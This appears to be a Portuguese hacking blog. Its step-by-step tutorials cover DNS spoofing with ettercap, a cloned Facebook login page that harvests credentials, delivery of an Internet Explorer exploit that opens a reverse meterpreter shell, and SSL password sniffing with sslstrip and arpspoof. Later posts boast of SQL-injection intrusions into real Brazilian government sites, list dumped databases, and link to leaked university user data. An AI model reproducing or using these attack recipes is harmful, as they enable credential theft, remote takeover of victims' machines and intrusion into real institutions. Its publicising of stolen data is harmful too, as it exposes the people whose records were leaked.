  $chmod +x metasploit-latest-linux-x64-installer.run
  $./metasploit-latest-linux-x64-installer.run

  Após a instalacão para entrar em modo console:
   
  $msfconsole

-------------------
---DNS Spoofing----
-------------------

  Vamos lá, utilizaremos o ettercap para efetuar o spoofing, para isso vamos passo a passo. Primeiramente
antes de mais nada precisamos editar o etter.dns nele vamos configurar o "redirecionamento" spoofing.

  $locate etter.dns
  $/usr/local/share/ettercap/etter.dns
  $nano /usr/local/share/ettercap/etter.dns

  Encontre as seguintes linhas:

  ################################
# microsoft sucks ;)
# redirect it to www.linux.org
#

microsoft.com      A   192.168.1.185
*.microsoft.com    A   192.168.1.185
www.microsoft.com  PTR 192.168.1.185      # Wildcards in PTR are not allowed

##########################################

  Vamos configurar o redirecionamento. Nesse exemplo vamos spoofar o facebook.com:

   ################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
                       
facebook.com      A   10.1.1.7
*.facebook.com    A   10.1.1.7
www.facebook.com  PTR 10.1.1.7      # Wildcards in PTR are not allowed

##########################################

  Atencão é preciso colocar o IP para onde vai ser spoofado no meu caso para a minha máquina (10.1.1.7).
Para saber o seu ip:

  $ifconfig eth0
  ou se está usando de interface wifi
  $ifconfig wlan0

  Para salvar o arquivo CTRL+O e para sair CTRL+X

  Vamos iniciar o ataque, o ettercap tem vários plugins e um deles é o dns_spoof o qual vamos utilizar para
efetuar o redirecionamento. 

  $ettercap -T -q -M arp -i wlan0 -P dns_spoof //

  - Modo Texto -T
  - Execucão em modo promiscuo -q
  - Redirecionamento MITM (Man in The Middle) -M arp
  - Interface de rede -i wlan0 
  - Plugin -P dns_spoof

  No meu caso estou usando a interface Wi-Fi pois estou no notebook =)

  Agora todos da rede que tentarem acessar o facebook.com irão ser redirecionados para a minha máquina. Observem:

  Activating dns_spoof plugin...
  dns_spoof: [www.facebook.com] spoofed to [10.1.1.7]

  Vamos brincar um pouco por exemplo tem uma tools de engenharia social chamada SET e ela tem várias opcões, 
uma delas é efetuar Clones de páginas.
  
  $cd /pentest/exploits/set
  $./set

  E vamos ter a seguinte página:

                  _______________________________
                 /   _____/\_   _____/\__    ___/
                 \_____  \  |    __)_   |    |   
                 /        \ |        \  |    |   
                /_______  //_______  /  |____|   
                        \/         \/            

  [---]        The Social-Engineer Toolkit (SET)         [---]
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]        Development Team: Garland                 [---]
  [---]                 Version: 3.1.3                   [---]
  [---]            Codename: 'User Awareness'            [---]
  [---]         Report bugs: davek@secmaniac.com         [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]        Homepage: http://www.secmaniac.com        [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    Join us on irc.freenode.net in channel #setoolkit

         Help support the toolkit, rank it here:
  http://sectools.org/tool/socialengineeringtoolkit/#comments

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 

  As opcoes que vou utilizar são as seguintes: 1 - 2 - 3 - 2 e vamos ter a seguinte página:

set:webattack>2
[-] Email harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:

  Agora vamos setar o site a ser clonado no nosso caso o facebook. 

set:webattack>2
[-] Email harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.facebook.com 

  OBS: Não se esquecam de para o ettercap antes pois se não ao tentar capturar a página o 
endereco vai ser spoofado.

  Vocês vão reparar que a ferramenta SET não é apenas uma simples ferramenta mas também uma 
ferramenta que funciona como "Keylogger" ele captura todos os eventos http POST e http GET :D
  Agora vou acessar o facebook de outra máquina: 10.1.1.8 e preencher os campos de login e 
senha e ver o que acontece nos logs do ettercap e do SET.

 - Logs Ettercap
Activating dns_spoof plugin...

HTTP : 10.1.1.7:80 -> USER: marcelomoraes@123.com  PASS: senha123  INFO: http://www.facebook.com/

  - Logs SET
10.1.1.8 - - [31/Mar/2012 22:03:02] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVr7yhLO                                                                           
PARAM: return_session=0                                                                       
PARAM: legacy_return=1                                                                        
PARAM: display=                                                                               
PARAM: session_key_only=0                                                                     
PARAM: trynum=1                                                                               
PARAM: charset_test=?,´,?,´,?,?,?                                                            
PARAM: timezone=                                                                              
PARAM: lgnrnd=180100_TMwd                                                                     
PARAM: lgnjs=n                                                                                
POSSIBLE USERNAME FIELD FOUND: email=marcelomoraes@123.com                                    
POSSIBLE PASSWORD FIELD FOUND: pass=senha123                                                  
PARAM: default_persistent=0                                                                   
POSSIBLE USERNAME FIELD FOUND: login=Entrar                                                   
[*] WHEN YOUR FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

  Bingo temos login e senha =D

  Bem vamos agora fazer algo mais interessante como ter acesso a máquina =D para isso vou 
estar utilizando o nosso querido Metasploit e aproveitar de uma falha no Internet explorer
para ganhar uma sessão Meterpreter. O exploit a ser utilizado é o seguinte: ms10_002_aurora

  Let's GO!!!!

  $msfconsole
  
  +-------------------------------------------------------+                                   
  |  METASPLOIT by Rapid7                                 |                                   
  +---------------------------+---------------------------+                                   
  |      __________________   |                           |                                   
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |                                   
  |             )=\           | |  EXPLOIT   \            |                                   
  |            // \\          | |_____________\_______    |                                   
  |           //   \\         | |==[msf >]============\   |                                   
  |          //     \\        | |______________________\  |                                   
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |                                   
  |        //         \\      |  *********************    |                                   
  +---------------------------+---------------------------+                                   
  |      o O o                |        \'\/\/\/'/         |                                   
  |              o O          |         )======(          |                                   
  |                 o         |       .'  LOOT  '.        |                                   
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |                                   
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |                                   
  | |________________|__|)__| |    |     __||_)     |     |                                   
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |                                   
  |  = = = = = = = = = = = =  |     '--------------'      |                                   
  +---------------------------+---------------------------+                                   
  


       =[ metasploit v4.2.0-release [core:4.2 api:1.0]
+ -- --=[ 805 exploits - 451 auxiliary - 135 post
+ -- --=[ 246 payloads - 27 encoders - 8 nops
       =[ svn r14805 updated 38 days ago (2012.02.23)

Warning: This copy of the Metasploit Framework was last updated 38 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

msf > use exploit/windows/browser/ms10_002_aurora
msf  exploit(ms10_002_aurora) > 

  Vou utilizar do Payload reverse_tcp então vamos a diante.

1 - msf  exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
1 - PAYLOAD => windows/meterpreter/reverse_tcp
2 - msf  exploit(ms10_002_aurora) > set LHOST 10.1.1.7
2 - LHOST => 10.1.1.7
3 - msf  exploit(ms10_002_aurora) > set SRVPORT 80
4 - SRVPORT => 8080
msf  exploit(ms10_002_aurora) > 

  1 - Setagem do Payload que vou estar usando no caso reverse_tcp para efetuar conexão reversa.
  2 - Setagem do host que vai ficar escutando para a conexão reversa, por padrão a porta
utilizada é a 4444, se quiserem mudar para outra porta é set LPORT porta
  3 - Setagem do endereco do servidor que vai ficar ativo para a vítima acessar.
  4 - Setagem da porta que o servidor vai usar no meu caso a porta 80 

  Agora vamos rodar:

1 - msf  exploit(ms10_002_aurora) > exploit
1 - [*] Exploit running as background job.

2 - [*] Started reverse handler on 10.1.1.7:4444 
3 - [*] Using URL: http://10.1.1.7:8080/2NvoSlFFh
4 - [*] Server started.
msf  exploit(ms10_002_aurora) > 

  1 - Comando para executar o exploit, 
  2 - Reparem que o handler para conexão reversa foi dado start e está escutando na porta 4444
  3 - URL para executar o exploit http://10.1.1.7:80/2NvoSlFFh
  4 - O servidor foi iniciado.

  Bem agora temos um problema que é fazer redirecionar para 10.1.1.7:8080/2NvoSlFFh pois o DNS
Spoofing é possível apenas redirecionar para o IP desejado, com isso vou usar o Apache Server
e criar um HTML simples para efetuar o redirecionamento para http://10.1.1.7:8080/2NvoSlFFh =D

  $cd /var/www
  $nano index.html

  Vamos apagar o conteúdo da index.html e colar o seguinte:

<html>
<head>
<meta http-equiv='refresh' content='0;url=http://10.1.1.7:8080/2NvoSlFFh'>
</head>
<body>
</body>
</html>

  Ao carregar a página ele vai ser jogado para o endereco que queremos =D, 
para salvar CTRL+O e para sair CTRL+X

  Basta agora rodar o ettercap : ettercap -T -q -M arp -i wlan0 -P dns_spoof //
  
  E ao tentar acessar o facebook.com >>

msf  exploit(ms10_002_aurora) > 
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 10.1.1.8

  Bingo Exploit Successful, basta aguartar um pouco e depois dar um sessions -l
para a listagem de sessões e depois sessions -i id_da_sessão e estamos dentro =)

  - Conclusão

  Bem o Artigo fala por si só então o que tenho para concluir é que o perigo pode
estar onde você menos espera ;D

  Espero que todos tenham gostado desse paper e usem com moderacão ;D
 
 
BY: R410X 

Caixa Data Base Pwned



Target: www.caixa.gov.br
Web Server: Microsoft-IIS/5.0
DB Server: MSSQL 2000 with error

>> Databases

[*] caixacultural
[*] cmsdb002
[*] consdb001
[*] dbIAS
[*] fhadb001
[*] licdb001
[*] licdb002
[*] master
[*] model
[*] msdb
[*] negdb001
[*] notdb001
[*] siinf
[*] tempdb
[*] unidades

##### Database: licdb001

Table found: CL800_ATUALIZACAO_ENDERECO
Table found: CL800_CONSULTOR
Table found: CL800_CPL
Table found: CL800_ESCRITORIO_DE_NEGOCIO
Table found: CL800_GISUP
Table found: CL800_GITEL
Table found: CL800_LOG
Table found: CL800_MEIO_DIVULGACAO
Table found: CL800_MONITORACAO
Table found: CL800_MONITORACAO_CRITERIO
Table found: CL800_MONITORACAO_EDITAL
Table found: CL800_MONITORACAO_PROCEDIMENTO
Table found: CL800_MONITORACAO_VENCEDOR
Table found: CL800_PONTO_VENDA
Table found: CL800_TIPO_CRITERIO
Table found: CL800_TIPO_FASE
Table found: CL800_TIPO_LOCALIZACAO
Table found: CL800_TIPO_PROCEDIMENTO
Table found: CL800_TIPO_RECURSO
Table found: CL800_TIPO_STATUS
Table found: CL800_TIPO_VENCEDOR
Table found: CPL
Table found: dtproperties
Table found: MONITORACAO
Table found: MONITORACAO_EDITAIS
Table found: RESultado_ShowContig
Table found: sysconstraints
Table found: syssegments
Table found: sysusers_backup
Table found: TBShowContig01

##### Database: licdb002

Table found: dtproperties
Table found: lictb000_ultimaatu
Table found: lictb001_andamento
Table found: lictb002_contratos
Table found: lictb003_canceladas
Table found: RESultado_ShowContig
Table found: sysconstraints
Table found: syssegments
Table found: sysusers_backup
Table found: Table1_Rep
Table found: TBShowContig01

##### Database: master

Table found: CHECK_CONSTRAINTS
Table found: COLUMN_DOMAIN_USAGE
Table found: COLUMN_PRIVILEGES
Table found: COLUMNS
Table found: CONSTRAINT_COLUMN_USAGE
Table found: CONSTRAINT_TABLE_USAGE
Table found: DOMAIN_CONSTRAINTS
Table found: DOMAINS
Table found: dtproperties
Table found: KEY_COLUMN_USAGE
Table found: PARAMETERS
Table found: REFERENTIAL_CONSTRAINTS
Table found: ROUTINE_COLUMNS
Table found: ROUTINES
Table found: SCHEMATA
Table found: spt_datatype_info
Table found: spt_datatype_info_ext
Table found: spt_fallback_db
Table found: spt_fallback_dev
Table found: spt_fallback_usg
Table found: spt_monitor
Table found: spt_provider_types
Table found: spt_server_info
Table found: spt_values
Table found: sysconstraints
Table found: syslogins
Table found: sysopentapes
Table found: sysremotelogins
Table found: syssegments
Table found: TABLE_CONSTRAINTS
Table found: TABLE_PRIVILEGES
Table found: TABLES
Table found: VIEW_COLUMN_USAGE
Table found: VIEW_TABLE_USAGE
Table found: VIEWS

##### Database: tempdb

Table found: sysconstraints
Table found: syssegments

##### Database: tempdb

Table found: backupfile
Table found: backupmediafamily
Table found: backupmediaset
Table found: backupset
Table found: dtproperties
Table found: logmarkhistory
Table found: mswebtasks
Table found: restorefile
Table found: restorefilegroup
Table found: restorehistory
Table found: syscategories
Table found: sysconstraints
Table found: sysjobs_view
Table found: syssegments
Table found: systasks_view

quarta-feira, 9 de maio de 2012

Sniff Senhas SSL

Hoje vamos aprender como capturar senhas SSL sobre LAN sem fio.

Ferramentas necessárias (isto é para linux)
Arpspoof
Sslstrip
Ettercap
Passo 1: echo 1> / proc/sys/net/ipv4/ip_forward

Passo 2: iptables-t nat-A PREROUTING-p tcp - destination-port 80-j
REDIRECT - to-ports 10000
Passo 3: sslstrip-l 10.000 -W dados

Passo 4: arpspoof-i wlan0-t 192.168.1.158 192.168.1.1

Uma vez que a ARP spoof começa, é só sentar e esperar que tudo está registado na nossa "dados" de arquivo. Uma vez que você acha que alguém pode ter entrado em um site SSL codificado, matar arpspoof e sslstrip. Agora, dê uma olhada no que nós capturamos.

Passo 4: ettercap-T-q-i wlan0

ou

Passo 4: dados gato

e, finalmente, temos isso: D

domingo, 12 de fevereiro de 2012

Mais Um Ptista Pro Saco haha

Segue a Lista Do banco De dados

http://pastebin.com/NZD4YnaB

Até o Proximo Post...........

quinta-feira, 12 de janeiro de 2012

Dados Do Site Da USP By: NeoInvasor

Seguem o Link Com Os Dados Dos Usuarios Da USP

http://pastebin.com/kfMQh9b5


By: NeoInvasor | Brazilian Underground Group

domingo, 1 de janeiro de 2012

Pentest ilhabela.sp.gov.br By NeoInvasor

Site:http://www.ilhabela.sp.gov.br/portugues/ver_conteudo_texto.php?cod_conteudo=0004436
Host IP: 189.126.107.47
Web Server: Apache
DB Server: MySQL error based
Resp. Time(avg): 186 ms
Current User: pref_ilhabela@localhost
Sql Version: 5.0.91-50
Current DB: pref_ilhabela
System User: pref_ilhabela@localhost
Host Name: L50DNN0143
Installation dir: /
DB User: 'pref_ilhabela'@'localhost'
Data Bases: information_schema
pref_ilhabela


Database: pref_ilhabela
[16 tables]
+-----------------------+
| cidade_banner |
| cidade_bd_categorias |
| cidade_bd_fotos |
| cidade_bd_layouts |
| cidade_bd_tipos |
| cidade_bd_ver |
| cidade_bd_videos |
| cidade_cadastro |
| cidade_contador |
| cidade_conteudo |
| cidade_enquete |
| cidade_enquete_opcoes |
| cidade_informacoes |
| cidade_links |
| cidade_secretarias |
| useronline |
+-----------------------+


Enjoy.......... ^^